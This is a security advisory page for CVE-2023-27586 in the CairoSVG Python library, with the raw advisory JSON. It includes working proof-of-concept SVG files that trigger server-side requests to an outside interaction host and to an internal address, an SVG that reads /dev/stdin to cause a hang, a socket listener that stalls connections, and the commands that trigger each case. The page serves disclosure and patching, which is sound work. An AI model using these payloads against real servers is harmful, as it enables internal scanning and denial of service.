GHSA-rwmf-w63j-p7gv
Vulnerability from github
Published
2023-03-20 21:27
Modified
2024-11-18 16:26
Severity ?
9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
7.8 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L
Summary
CairoSVG improperly processes SVG files loaded from external resources
Details

SSRF vulnerability

Summary

When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.

Operating system, version and so on

Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9

Tested CairoSVG version

2.6.0

Details

A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources. It looks like this bug can affect websites and cause request forgery on the server.

PoC

  1. Generating malicious svg file: 1.1 CairoSVG_exploit.svg: ```svg
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" xlink:href="http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3" />
<style type="text/css">@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5");</style>
<style type="text/css">
     <![CDATA[
        @import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9");
        rect { fill: red; stroke: blue; stroke-width: 3 }
     ]]>
</style>

```

1.2 CairoSVG_exploit_2.svg: ```svg

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
    <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
        <image xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11" x="0" y="0" width="600" height="450" />
    </pattern>
</defs>
<path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" />

```

1.3 CairoSVG_exploit_3.svg: ```svg

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13" />

```

  1. Run some commands: $ python3 -m cairosvg CairoSVG_exploit.svg -f png $ python3 -m cairosvg CairoSVG_exploit_2.svg -f png $ python3 -m cairosvg CairoSVG_exploit_3.svg -f png

  2. See result requests in Burp Collaborator: 1

DOS vulnerability with SSTI

Summary

When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.

Operating system, version and so on

Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9

Tested CairoSVG version

2.6.0

PoC

  1. Generating malicious svg file:

```svg

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://192.168.56.1:1234/" />

```

  1. In other server run this python program:

python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 1234)) s.listen(1) conn, addr = s.accept() with conn: while True: data = conn.recv(2048) s.close()

  1. Run commands: $timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png (without timeout server will hang forever)

DOS vulnerability with stdin file descriptor

Summary

Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.

Operating system, version and so on

Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9

Tested CairoSVG version

2.6.0

PoC

  1. Generating malicious svg file:

```svg

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="file:///dev/stdin" />

```

  1. In other server run this python program: python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 1234)) s.listen(1) conn, addr = s.accept() with conn: while True: data = conn.recv(2048) s.close()

  2. Run commands: $timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "CairoSVG"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-27586"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-20T21:27:15Z",
    "nvd_published_at": "2023-03-20T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "# SSRF vulnerability\n\n## Summary\nWhen CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## Details\nA specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization\u0027s internal resources or a DDOS attack on external resources.\nIt looks like this bug can affect websites and cause request forgery on the server.\n\n## PoC\n1. Generating malicious svg file:\n1.1 CairoSVG_exploit.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n    \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n    \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n    \u003cimage height=\"200\" width=\"200\" xlink:href=\"http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3\" /\u003e\n    \u003cstyle type=\"text/css\"\u003e@import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5\");\u003c/style\u003e\n    \u003cstyle type=\"text/css\"\u003e\n         \u003c![CDATA[\n            @import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9\");\n            rect { fill: red; stroke: blue; stroke-width: 3 }\n         ]]\u003e\n    \u003c/style\u003e\n\u003c/svg\u003e\n```\n\n1.2 CairoSVG_exploit_2.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n    \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n    \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n    \u003cdefs\u003e\n        \u003cpattern id=\"img1\" patternUnits=\"userSpaceOnUse\" width=\"600\" height=\"450\"\u003e\n            \u003cimage xlink:href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11\" x=\"0\" y=\"0\" width=\"600\" height=\"450\" /\u003e\n        \u003c/pattern\u003e\n    \u003c/defs\u003e\n    \u003cpath d=\"M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z\" fill=\"url(#img1)\" /\u003e\n\u003c/svg\u003e\n```\n\n1.3 CairoSVG_exploit_3.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n    \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n    \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n    \u003cuse href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13\" /\u003e\n\u003c/svg\u003e\n```\n\n2. Run some commands:\n`$ python3 -m cairosvg CairoSVG_exploit.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png `\n\n3. See result requests in Burp Collaborator:\n![1](https://user-images.githubusercontent.com/952243/224340068-547b1d9a-5513-48a5-9cdf-b34b693f80c2.png)\n\n\n\n# DOS vulnerability with SSTI\n\n## Summary\nWhen CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n    \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n    \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n    \u003cuse href=\"http://192.168.56.1:1234/\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n    while True:\n        data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png`\n(without timeout server will hang forever)\n\n\n# DOS vulnerability with stdin file descriptor\n\n## Summary\n\nSpecially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n    \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n    \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n    \u003cuse href=\"file:///dev/stdin\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n    while True:\n        data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png`",
  "id": "GHSA-rwmf-w63j-p7gv",
  "modified": "2024-11-18T16:26:29Z",
  "published": "2023-03-20T21:27:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27586"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Kozea/CairoSVG"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/cairosvg/PYSEC-2023-9.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "CairoSVG improperly processes SVG files loaded from external resources"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.